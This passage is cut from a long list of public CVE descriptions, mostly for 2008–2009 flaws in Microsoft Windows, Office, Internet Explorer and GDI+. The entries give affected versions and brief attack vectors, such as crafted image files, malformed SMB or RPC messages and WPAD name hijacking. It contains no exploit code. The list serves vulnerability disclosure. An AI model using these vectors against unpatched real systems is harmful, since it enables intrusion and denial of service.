SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 does not properly allocate an unspecified buffer, which allows remote attackers to execute arbitrary code via a crafted TIFF image file that triggers memory corruption, aka "GDI+ TIFF Memory Corruption Vulnerability." [CVE-2009-2502] Buffer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted TIFF image file, aka "GDI+ TIFF Buffer Overflow Vulnerability." [CVE-2009-2501] Heap-based buffer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted PNG image file, aka "GDI+ PNG Heap Overflow Vulnerability." [CVE-2009-2500] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted WMF image file, aka "GDI+ WMF Integer Overflow Vulnerability." [CVE-2009-2499] Microsoft Windows Media Format Runtime 9.0, 9.5, and 11 [CVE-2009-2498] Microsoft Windows Media Format Runtime 9.0, 9.5, and 11 and Windows Media Services 9.1 and 2008 do not properly parse malformed headers in Advanced Systems Format (ASF) files, which allows remote attackers to execute arbitrary code via a crafted (1) .asf, (2) .wmv, or (3) .wma file, aka "Windows Media Header Parsing Invalid Free Vulnerability." [CVE-2009-2494] The Active Template Library (ATL) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via vectors related to erroneous free operations after reading a variant from a stream and deleting this variant, aka "ATL Object Type Mismatch Vulnerability." [CVE-2009-2484] Stack-based buffer overflow in the Win32AddConnection function in modules/access/smb.c in VideoLAN VLC media player 0.9.9, when running on Microsoft Windows, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long smb URI in a playlist file. [CVE-2009-2357] The default configuration of TekRADIUS 3.0 uses the sa account to communicate with Microsoft SQL Server, which makes it easier for remote attackers to obtain privileged access to the database and the underlying Windows operating system. [CVE-2009-1930] The Telnet service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote Telnet servers to execute arbitrary code on a client machine by replaying the NTLM credentials of a client user, aka "Telnet Credential Reflection Vulnerability," a related issue to CVE-2000-0834. [CVE-2009-1929] Heap-based buffer overflow in the Microsoft Terminal Services Client ActiveX control running RDP 6.1 on Windows XP SP2, Vista SP1 or SP2, or Server 2008 Gold or SP2 [CVE-2009-1928] Stack consumption vulnerability in the LDAP service in Active Directory on Microsoft Windows 2000 SP4, Server 2003 SP2, and Server 2008 Gold and SP2 [CVE-2009-1926] Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to cause a denial of service (TCP outage) via a series of TCP sessions that have pending data and a (1) small or (2) zero receive window size, and remain in the FIN-WAIT-1 or FIN-WAIT-2 state indefinitely, aka "TCP/IP Orphaned Connections Vulnerability." [CVE-2009-1925] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 does not properly manage state information, which allows remote attackers to execute arbitrary code by sending packets to a listening service, and thereby triggering misinterpretation of an unspecified field as a function pointer, aka "TCP/IP Timestamps Code Execution Vulnerability." [CVE-2009-1924] Integer overflow in the Windows Internet Name Service (WINS) component for Microsoft Windows 2000 SP4 allows remote WINS replication partners to execute arbitrary code via crafted data structures in a packet, aka "WINS Integer Overflow Vulnerability." [CVE-2009-1923] Heap-based buffer overflow in the Windows Internet Name Service (WINS) component for Microsoft Windows 2000 SP4 and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted WINS replication packet that triggers an incorrect buffer-length calculation, aka "WINS Heap Overflow Vulnerability." [CVE-2009-1922] The Message Queuing (aka MSMQ) service for Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP2, and Vista Gold does not properly validate unspecified IOCTL request data from user mode before passing this data to kernel mode, which allows local users to gain privileges via a crafted request, aka "MSMQ Null Pointer Vulnerability." [CVE-2009-1920] The JScript scripting engine 5.1, 5.6, 5.7, and 5.8 in JScript.dll in Microsoft Windows, as used in Internet Explorer, does not properly load decoded scripts into memory before execution, which allows remote attackers to execute arbitrary code via a crafted web site that triggers memory corruption, aka "JScript Remote Code Execution Vulnerability." [CVE-2009-1808] Microsoft Windows XP SP3 allows local users to cause a denial of service (system crash) by making an SPI_SETDESKWALLPAPER SystemParametersInfo call with an improperly terminated pvParam argument, followed by an SPI_GETDESKWALLPAPER SystemParametersInfo call. [CVE-2009-1546] Integer overflow in Avifil32.dll in the Windows Media file handling functionality in Microsoft Windows allows remote attackers to execute arbitrary code on a Windows 2000 SP4 system via a crafted AVI file, or cause a denial of service on a Windows XP SP2 or SP3, Server 2003 SP2, Vista Gold, SP1, or SP2, or Server 2008 Gold or SP2 system via a crafted AVI file, aka "AVI Integer Overflow Vulnerability." [CVE-2009-1545] Unspecified vulnerability in Avifil32.dll in the Windows Media file handling functionality in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a malformed header in a crafted AVI file, aka "Malformed AVI Header Vulnerability." [CVE-2009-1544] Double free vulnerability in the Workstation service in Microsoft Windows allows remote authenticated users to gain privileges via a crafted RPC message to a Windows XP SP2 or SP3 or Server 2003 SP2 system, or cause a denial of service via a crafted RPC message to a Vista Gold, SP1, or SP2 or Server 2008 Gold or SP2 system, aka "Workstation Service Memory Corruption Vulnerability." [CVE-2009-1539] The QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 does not properly validate unspecified size fields in QuickTime media files, which allows remote attackers to execute arbitrary code via a crafted file, aka "DirectX Size Validation Vulnerability." [CVE-2009-1538] The QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 performs updates to pointers without properly validating unspecified data values, which allows remote attackers to execute arbitrary code via a crafted QuickTime media file, aka "DirectX Pointer Validation Vulnerability." [CVE-2009-1537] Unspecified vulnerability in the QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted QuickTime media file, as exploited in the wild in May 2009, aka "DirectX NULL Byte Overwrite Vulnerability." [CVE-2009-1533] Buffer overflow in the Works for Windows document converters in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP3, Office 2007 SP1, and Works 8.5 and 9 allows remote attackers to execute arbitrary code via a crafted Works .wps file that triggers memory corruption, aka "File Converter Buffer Overflow Vulnerability." [CVE-2009-1532] Microsoft Internet Explorer 8 for Windows XP SP2 and SP3 [CVE-2009-1531] Microsoft Internet Explorer 7 for Windows XP SP2 and SP3 [CVE-2009-1530] Use-after-free vulnerability in Microsoft Internet Explorer 7 for Windows XP SP2 and SP3 [CVE-2009-1529] Microsoft Internet Explorer 7 for Windows XP SP2 and SP3 [CVE-2009-1528] Microsoft Internet Explorer 6 and 7 for Windows XP SP2 and SP3 [CVE-2009-1511] GDI+ in Microsoft Windows XP SP3 allows remote attackers to cause a denial of service (infinite loop) via a PNG file that contains a certain large btChunkLen value. [CVE-2009-1335] Microsoft Internet Explorer 7 and 8 on Windows XP and Vista allows remote attackers to cause a denial of service (application hang) via a large document composed of unprintable characters, aka MSRC 9011jr. [CVE-2009-1331] Integer overflow in Microsoft Windows Media Player (WMP) 11.0.5721.5260 allows remote attackers to cause a denial of service (application crash) via a crafted .mid file, as demonstrated by crash.mid. [CVE-2009-1217] Off-by-one error in the GpFont::SetData function in gdiplus.dll in Microsoft GDI+ on Windows XP allows remote attackers to cause a denial of service (stack corruption and application termination) via a crafted EMF file that triggers an integer overflow, as demonstrated by voltage-exploit.emf, aka the "Microsoft GdiPlus EMF GpFont.SetData integer overflow." [CVE-2009-1216] Multiple unspecified vulnerabilities in (1) unlzh.c and (2) unpack.c in the gzip libraries in Microsoft Windows Server 2008, Windows Services for UNIX 3.0 and 3.5, and the Subsystem for UNIX-based Applications (SUA) [CVE-2009-1141] Microsoft Internet Explorer 6 for Windows XP SP2 and SP3 and Server 2003 SP2 allows remote attackers to execute arbitrary code via unspecified DHTML function calls related to a tr element and the "insertion, deletion and attributes of a table cell," which trigger memory corruption when the window is destroyed, aka "DHTML Object Memory Corruption Vulnerability." [CVE-2009-1139] Memory leak in the LDAP service in Active Directory on Microsoft Windows 2000 SP4 and Server 2003 SP2, and Active Directory Application Mode (ADAM) on Windows XP SP2 and SP3 and Server 2003 SP2, allows remote attackers to cause a denial of service (memory consumption and service outage) via (1) LDAP or (2) LDAPS requests with unspecified OID filters, aka "Active Directory Memory Leak Vulnerability." [CVE-2009-1138] The LDAP service in Active Directory on Microsoft Windows 2000 SP4 does not properly free memory for LDAP and LDAPS requests, which allows remote attackers to execute arbitrary code via a request that uses hexadecimal encoding, whose associated memory is not released, related to a "DN AttributeValue," aka "Active Directory Invalid Free Vulnerability." NOTE: this issue is probably a memory leak. [CVE-2009-1133] Heap-based buffer overflow in Microsoft Remote Desktop Connection (formerly Terminal Services Client) running RDP 5.0 through 6.1 on Windows, and Remote Desktop Connection Client for Mac 2.0, allows remote attackers to execute arbitrary code via unspecified parameters, aka "Remote Desktop Connection Heap Overflow Vulnerability." [CVE-2009-1132] Heap-based buffer overflow in the Wireless LAN AutoConfig Service (aka Wlansvc) in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a malformed wireless frame, aka "Wireless Frame Parsing Remote Code Execution Vulnerability." [CVE-2009-1127] win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not correctly validate an argument to an unspecified system call, which allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, aka "Win32k NULL Pointer Dereferencing Vulnerability." [CVE-2009-1126] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly validate the user-mode input associated with the editing of an unspecified desktop parameter, which allows local users to gain privileges via a crafted application, aka "Windows Desktop Parameter Edit Vulnerability." [CVE-2009-1125] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate an argument to an unspecified system call, which allows local users to gain privileges via a crafted application, aka "Windows Driver Class Registration Vulnerability." [CVE-2009-1124] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate user-mode pointers in unspecified error conditions, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Pointer Validation Vulnerability." [CVE-2009-1123] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate changes to unspecified kernel objects, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Desktop Vulnerability." [CVE-2009-1122] The WebDAV extension in Microsoft Internet Information Services (IIS) 5.0 on Windows 2000 SP4 does not properly decode URLs, which allows remote attackers to bypass authentication, and possibly read or create files, via a crafted HTTP request, aka "IIS 5.0 WebDAV Authentication Bypass Vulnerability," a different vulnerability than CVE-2009-1535. [CVE-2009-1043] Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to execute arbitrary code via unknown vectors triggered by clicking on a link, as demonstrated by Nils during a PWN2OWN competition at CanSecWest 2009. [CVE-2009-0568] The RPC Marshalling Engine (aka NDR) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly maintain its internal state, which allows remote attackers to overwrite arbitrary memory locations via a crafted RPC message that triggers incorrect pointer reading, related to "IDL interfaces containing a non-conformant varying array" and FC_SMVARRAY, FC_LGVARRAY, FC_VARIABLE_REPEAT, and FC_VARIABLE_OFFSET, aka "RPC Marshalling Engine Vulnerability." [CVE-2009-0555] Microsoft Windows Media Runtime, as used in DirectShow WMA Voice Codec, Windows Media Audio Voice Decoder, and Audio Compression Manager (ACM), does not properly process Advanced Systems Format (ASF) files, which allows remote attackers to execute arbitrary code via a crafted audio file that uses the Windows Media Speech codec, aka "Windows Media Runtime Voice Sample Rate Vulnerability." [CVE-2009-0554] Microsoft Internet Explorer 5.01 SP4, 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0553] Microsoft Internet Explorer 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0552] Unspecified vulnerability in Microsoft Internet Explorer 5.01 SP4, 6 SP1, 6 on Windows XP SP2 and SP3, and 6 on Windows Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0551] Microsoft Internet Explorer 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 does not properly handle transition errors in a request for one HTTP document followed by a request for a second HTTP document, which allows remote attackers to execute arbitrary code via vectors involving (1) multiple crafted pages on a web site or (2) a web page with crafted inline content such as banner advertisements, aka "Page Transition Memory Corruption Vulnerability." [CVE-2009-0550] Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 [CVE-2009-0341] The shell32 module in Microsoft Internet Explorer 7.0 on Windows XP SP3 might allow remote attackers to execute arbitrary code via a long VALUE attribute in an INPUT element, possibly related to a stack consumption vulnerability. [CVE-2009-0320] Microsoft Windows XP, Server 2003 and 2008, and Vista exposes I/O activity measurements of all processes, which allows local users to obtain sensitive information, as demonstrated by reading the I/O Other Bytes column in Task Manager (aka taskmgr.exe) to estimate the number of characters that a different user entered at a runas.exe password prompt, related to a "benchmarking attack." [CVE-2009-0244] Directory traversal vulnerability in the OBEX FTP Service in the Microsoft Bluetooth stack in Windows Mobile 6 Professional, and probably Windows Mobile 5.0 for Pocket PC and 5.0 for Pocket PC Phone Edition, allows remote authenticated users to list arbitrary directories, and create or read arbitrary files, via a .. (dot dot) in a pathname. NOTE: this can be leveraged for code execution by writing to a Startup folder. [CVE-2009-0243] Microsoft Windows does not properly enforce the Autorun and NoDriveTypeAutoRun registry values, which allows physically proximate attackers to execute arbitrary code by (1) inserting CD-ROM media, (2) inserting DVD media, (3) connecting a USB device, and (4) connecting a Firewire device [CVE-2009-0239] Cross-site scripting (XSS) vulnerability in Windows Search 4.0 for Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows user-assisted remote attackers to inject arbitrary web script or HTML via a crafted file that appears in a preview in a search result, aka "Script Execution in Windows Search Vulnerability." [CVE-2009-0235] Stack-based buffer overflow in the Word 97 text converter in WordPad in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted Word 97 file that triggers memory corruption, related to use of inconsistent integer data sizes for an unspecified length field, aka "WordPad Word 97 Text Converter Stack Overflow Vulnerability." [CVE-2009-0234] The DNS Resolver Cache Service (aka DNSCache) in Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008 does not properly cache crafted DNS responses, which makes it easier for remote attackers to predict transaction IDs and poison caches by sending many crafted DNS queries that trigger "unnecessary lookups," aka "DNS Server Response Validation Vulnerability." [CVE-2009-0233] The DNS Resolver Cache Service (aka DNSCache) in Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008, when dynamic updates are enabled, does not reuse cached DNS responses in all applicable situations, which makes it easier for remote attackers to predict transaction IDs and poison caches by simultaneously sending crafted DNS queries and responses, aka "DNS Server Query Validation Vulnerability." [CVE-2009-0232] Integer overflow in the Embedded OpenType (EOT) Font Engine in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted name table, aka "Embedded OpenType Font Integer Overflow Vulnerability." [CVE-2009-0231] The Embedded OpenType (EOT) Font Engine (T2EMBED.DLL) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted name table in a data record that triggers an integer truncation and a heap-based buffer overflow, aka "Embedded OpenType Font Heap Overflow Vulnerability." [CVE-2009-0230] The Windows Print Spooler in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 allows remote authenticated users to gain privileges via a crafted RPC message that triggers loading of a DLL file from an arbitrary directory, aka "Print Spooler Load Library Vulnerability." [CVE-2009-0229] The Windows Printing Service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 allows local users to read arbitrary files via a crafted separator page, aka "Print Spooler Read File Vulnerability." [CVE-2009-0228] Stack-based buffer overflow in the EnumeratePrintShares function in Windows Print Spooler Service (win32spl.dll) in Microsoft Windows 2000 SP4 allows remote printer servers to execute arbitrary code via a a crafted ShareName in a response to an RPC request, related to "printing data structures," aka "Buffer Overflow in Print Spooler Vulnerability." [CVE-2009-0202] Array index error in FL21WIN.DLL in the PowerPoint Freelance Windows 2.1 Translator in Microsoft PowerPoint 2000 and 2002 allows remote attackers to execute arbitrary code via a Freelance file with unspecified "layout information" that triggers a heap-based buffer overflow. [CVE-2009-0119] Buffer overflow in Microsoft Windows XP SP3 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via a crafted .chm file. [CVE-2009-0094] The WINS server in Microsoft Windows 2000 SP4 and Server 2003 SP1 and SP2 does not restrict registration of the (1) "wpad" and (2) "isatap" NetBIOS names, which allows remote authenticated users to hijack the Web Proxy Auto-Discovery (WPAD) and Intra-Site Automatic Tunnel Addressing Protocol (ISATAP) features, and conduct man-in-the-middle attacks by spoofing a proxy server or ISATAP route, by registering one of these names in the WINS database, aka "WPAD WINS Server Registration Vulnerability," a related issue to CVE-2007-1692. [CVE-2009-0093] Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008, when dynamic updates are enabled, does not restrict registration of the "wpad" hostname, which allows remote authenticated users to hijack the Web Proxy Auto-Discovery (WPAD) feature, and conduct man-in-the-middle attacks by spoofing a proxy server, via a Dynamic Update request for this hostname, aka "DNS Server Vulnerability in WPAD Registration Vulnerability," a related issue to CVE-2007-1692. [CVE-2009-0089] Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, and Vista Gold allows remote web servers to impersonate arbitrary https web sites by using DNS spoofing to "forward a connection" to a different https web site that has a valid certificate matching its own domain name, but not a certificate matching the domain name of the host requested by the user, aka "Windows HTTP Services Certificate Name Mismatch Vulnerability." [CVE-2009-0087] Unspecified vulnerability in the Word 6 text converter in WordPad in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 [CVE-2009-0086] Integer underflow in Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote HTTP servers to execute arbitrary code via crafted parameter values in a response, related to error handling, aka "Windows HTTP Services Integer Underflow Vulnerability." [CVE-2009-0085] The Secure Channel (aka SChannel) authentication component in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008, when certificate authentication is used, does not properly validate the client's key exchange data in Transport Layer Security (TLS) handshake messages, which allows remote attackers to spoof authentication by crafting a TLS packet based on knowledge of the certificate but not the private key, aka "SChannel Spoofing Vulnerability." [CVE-2009-0083] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 does not properly handle invalid pointers, which allows local users to gain privileges via an application that triggers use of a crafted pointer, aka "Windows Kernel Invalid Pointer Vulnerability." [CVE-2009-0082] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate handles, which allows local users to gain privileges via a crafted application that triggers unspecified "actions," aka "Windows Kernel Handle Validation Vulnerability." [CVE-2009-0081] The graphics device interface (GDI) implementation in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate input received from user mode, which allows remote attackers to execute arbitrary code via a crafted (1) Windows Metafile (aka WMF) or (2) Enhanced Metafile (aka EMF) image file, aka "Windows Kernel Input Validation Vulnerability." [CVE-2009-0079] The RPCSS service in Microsoft Windows XP SP2 and SP3 and Server 2003 SP1 and SP2 does not properly implement isolation among a set of distinct processes that (1) all run under the NetworkService account or (2) all run under the LocalService account, which allows local users to gain privileges by accessing the resources of one of the processes, aka "Windows RPCSS Service Isolation Vulnerability." [CVE-2009-0078] The Windows Management Instrumentation (WMI) provider in Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly implement isolation among a set of distinct processes that (1) all run under the NetworkService account or (2) all run under the LocalService account, which allows local users to gain privileges by accessing the resources of one of the processes, aka "Windows WMI Service Isolation Vulnerability." [CVE-2008-6819] win32k.sys in Microsoft Windows Server 2003 and Vista allows local users to cause a denial of service (system crash) via vectors related to CreateWindow, TranslateMessage, and DispatchMessage, possibly a race condition between threads, a different vulnerability than CVE-2008-1084. NOTE: some of these details are obtained from third party information. [CVE-2008-6194] Memory leak in the DNS server in Microsoft Windows allows remote attackers to cause a denial of service (memory consumption) via DNS packets. NOTE: this issue reportedly exists because of an incorrect fix for CVE-2007-3898. [CVE-2008-5828] Microsoft Windows Live Messenger Client 8.5.1 and earlier, when MSN Protocol Version 15 (MSNP15) is used over a NAT session, allows remote attackers to discover intranet IP addresses and port numbers by reading the (1) IPv4InternalAddrsAndPorts, (2) IPv4Internal-Addrs, and (3) IPv4Internal-Port header fields. [CVE-2008-5823] An ActiveX control in prtstb06.dll in Microsoft Money 2006, when used with WScript in Windows Script Host (WSH) on Windows Vista, allows remote attackers to cause a denial of service (access violation and application crash) via a zero value for the Startup property. [CVE-2008-5750] Argument injection vulnerability in Microsoft Internet Explorer 8 beta 2 on Windows XP SP3 allows remote attackers to execute arbitrary commands via the --renderer-path option in a chromehtml: URI. [CVE-2008-5745] Integer overflow in quartz.dll in the DirectShow framework in Microsoft Windows Media Player (WMP) 9, 10, and 11, including 11.0.5721.5260, allows remote attackers to cause a denial of service (application crash) via a crafted (1) WAV, (2) SND, or (3) MID file. NOTE: this has been incorrectly reported as a code-execution vulnerability. NOTE: it is not clear whether this issue is related to CVE-2008-4927. [CVE-2008-5232] Buffer overflow in the CallHTMLHelp method in the Microsoft Windows Media Services ActiveX control in nskey.dll 4.1.00.3917 in Windows Media Services on Microsoft Windows NT and 2000, and Avaya Media and Message Application servers, allows remote attackers to execute arbitrary code via a long argument. NOTE: the provenance of this information is unknown [CVE-2008-5229] Stack-based buffer overflow in Microsoft Device IO Control in iphlpapi.dll in Microsoft Windows Vista Gold and SP1 allows local users in the Network Configuration Operator group to gain privileges or cause a denial of service (system crash) via a large invalid PrefixLength to the CreateIpForwardEntry2 method, as demonstrated by a "route add" command. NOTE: this issue might not cross privilege boundaries. [CVE-2008-5179] Unspecified vulnerability in Microsoft Office Communications Server (OCS), Office Communicator, and Windows Live Messenger allows remote attackers to cause a denial of service (crash) via a crafted Real-time Transport Control Protocol (RTCP) receiver report packet. [CVE-2008-5112] The LDAP server in Active Directory in Microsoft Windows 2000 SP4 and Server 2003 SP1 and SP2 responds differently to a failed bind attempt depending on whether the user account exists and is permitted to login, which allows remote attackers to enumerate valid usernames via a series of LDAP bind requests, as demonstrated by ldapuserenum. [CVE-2008-5044] Race condition in Microsoft Windows Server 2003 and Vista allows local users to cause a denial of service (crash or hang) via a multi-threaded application that makes many calls to UnhookWindowsHookEx while certain other desktop activity is occurring. [CVE-2008-4927] Microsoft Windows Media Player (WMP) 9.0 through 11 allows user-assisted attackers to cause a denial of service (application crash) via a malformed (1) MIDI or (2) DAT file, related to "MThd Header Parsing." NOTE: the provenance of this information is unknown [CVE-2008-4841] The WordPad Text Converter for Word 97 files in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted (1) .doc, (2) .wri, or (3) .rtf Word 97 file that triggers memory corruption, as exploited in the wild in December 2008. NOTE: As of 20081210, it is unclear whether this vulnerability is related to a WordPad issue disclosed on 20080925 with a 2008-crash.doc.rar example, but there are insufficient details to be sure. [CVE-2008-4835] SMB in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via malformed values of unspecified "fields inside the SMB packets" in an NT Trans2 request, related to "insufficiently validating the buffer size," aka "SMB Validation Remote Code Execution Vulnerability." [CVE-2008-4834] Buffer overflow in SMB in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via malformed values of unspecified "fields inside the SMB packets" in an NT Trans request, aka "SMB Buffer Overflow Remote Code Execution Vulnerability." [CVE-2008-4609] The TCP implementation in (1) Linux, (2) platforms based on BSD Unix, (3) Microsoft Windows, (4) Cisco products, and probably other operating systems allows remote attackers to cause a denial of service (connection queue exhaustion) via multiple vectors that manipulate information in the TCP state table, as demonstrated by sockstress. [CVE-2008-4510] Microsoft Windows Vista Home and Ultimate Edition SP1 and earlier allows local users to cause a denial of service (page fault and system crash) via multiple attempts to access a virtual address in a PAGE_NOACCESS memory page. [CVE-2008-4327] gdiplus.dll in GDI+ in Microsoft Windows XP SP3 does not properly handle crafted .ico files, which allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a certain crash.ico file on a web site, and allows user-assisted attackers to cause a denial of service (divide-by-zero error and persistent application crash) via this crash.ico file on the desktop, a different vulnerability than CVE-2007-2237. [CVE-2008-4323] Windows Explorer in Microsoft Windows XP SP3 allows user-assisted attackers to cause a denial of service (application crash) via a crafted .ZIP file. [CVE-2008-4295] Microsoft Windows Mobile 6.0 on HTC Wiza 200 and HTC MDA 8125 devices does not properly handle the first attempt to establish a 